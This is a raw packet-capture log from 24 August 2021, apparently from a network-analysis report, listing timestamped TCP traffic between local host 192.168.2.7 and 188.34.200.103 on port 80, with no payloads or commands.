Aug 24, 2021 08:46:59.181767941 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181773901 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181802988 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181822062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181826115 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181838036 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181853056 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181868076 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181870937 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181883097 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181905985 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181937933 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181946039 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181962013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181977034 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.181989908 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.181993961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.182028055 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201261997 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201296091 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201311111 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201329947 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201349020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201365948 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201365948 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201381922 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201396942 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201406956 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201421976 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201436996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201447010 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201455116 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201474905 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201477051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201497078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201499939 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201514006 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201530933 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201548100 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201555014 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201565027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201581955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201598883 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201612949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201618910 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201618910 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201637030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201653957 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201668978 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201668978 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201679945 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201683044 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201703072 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201716900 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201719999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201735973 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201749086 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201751947 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201767921 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201777935 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201785088 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201801062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201812983 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201814890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201834917 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201836109 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201854944 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201868057 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201872110 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201889038 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201904058 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201911926 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201919079 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201935053 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201948881 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.201952934 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201972961 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201986074 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.201992989 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202003002 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202018976 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202019930 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202035904 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202045918 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202054977 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202074051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202089071 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202097893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202105999 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202107906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202126026 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202133894 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202143908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202163935 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202174902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202183008 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202205896 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202208996 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202224016 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202228069 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202239037 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202255011 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202269077 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202270985 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202285051 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202301025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202306986 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202316999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202331066 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202336073 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202354908 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202363014 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202369928 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202384949 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202388048 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202404022 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202419043 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202425957 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202435970 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202451944 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202470064 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202471018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202488899 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202496052 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202506065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202522039 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202528954 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202537060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202553034 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202557087 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202569008 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202580929 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202585936 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202605963 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202617884 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202622890 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202637911 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202649117 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202657938 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202665091 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202682972 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202687979 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202699900 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202713013 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202716112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202732086 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202748060 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202754974 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202764034 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202775955 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202788115 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202789068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202804089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202819109 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202826023 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202837944 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202857018 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202857018 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202872992 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202882051 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202891111 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202907085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202924013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202943087 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202950001 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202960014 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202979088 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.202991009 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.202996969 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203012943 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203021049 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203031063 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203048944 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203052044 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203064919 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203082085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203085899 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203099012 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203129053 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203140020 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203150988 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203159094 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.203193903 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.203239918 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.223803997 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223845005 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223869085 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223892927 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223932028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223956108 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223978996 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.223984003 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224004030 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224020958 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224028111 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224050999 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224050999 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224072933 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224077940 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224097013 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224122047 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224126101 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224144936 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224168062 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224169016 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224190950 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224193096 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224214077 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224240065 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224241018 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224262953 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224265099 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224284887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224312067 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224328995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224335909 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224343061 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224359035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224396944 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224400997 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224438906 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224493027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224514008 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224517107 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224540949 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224549055 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224564075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224586964 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224605083 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224606991 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224618912 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224632025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224646091 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224656105 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224679947 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224682093 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224704027 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224713087 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224730015 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224739075 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224752903 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224762917 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224793911 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224881887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224906921 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224925041 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224950075 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.224958897 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.224982023 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225019932 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225022078 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225047112 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225090027 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225094080 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225116968 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225138903 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225157976 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225158930 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225182056 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225182056 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225205898 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225222111 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225229979 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225253105 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225260019 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225280046 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225301027 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225306034 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225330114 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225331068 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225351095 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225361109 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225374937 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225384951 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225397110 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225419044 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225421906 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225440025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225466967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225470066 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225482941 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225490093 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225512028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225522041 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225533962 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225557089 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225558996 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225579977 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225589991 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225604057 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225620031 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225629091 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225651979 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225653887 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225673914 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225677967 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225689888 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225702047 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225714922 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225725889 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225737095 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225749969 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225774050 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225790024 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225794077 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225796938 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225817919 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225828886 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225845098 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225861073 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225868940 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225891113 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225893021 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225910902 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225915909 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225934029 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225939035 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225955009 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225961924 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.225975990 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.225986004 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226000071 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226010084 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226022005 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226037025 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226044893 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226062059 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226073027 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226083994 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226095915 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226109028 CEST	80	49719	188.34.200.103	192.168.2.7
Aug 24, 2021 08:46:59.226119995 CEST	49719	80	192.168.2.7	188.34.200.103
Aug 24, 2021 08:46:59.226131916 CEST	80	49719	188.34.200.103	192.168.2.7
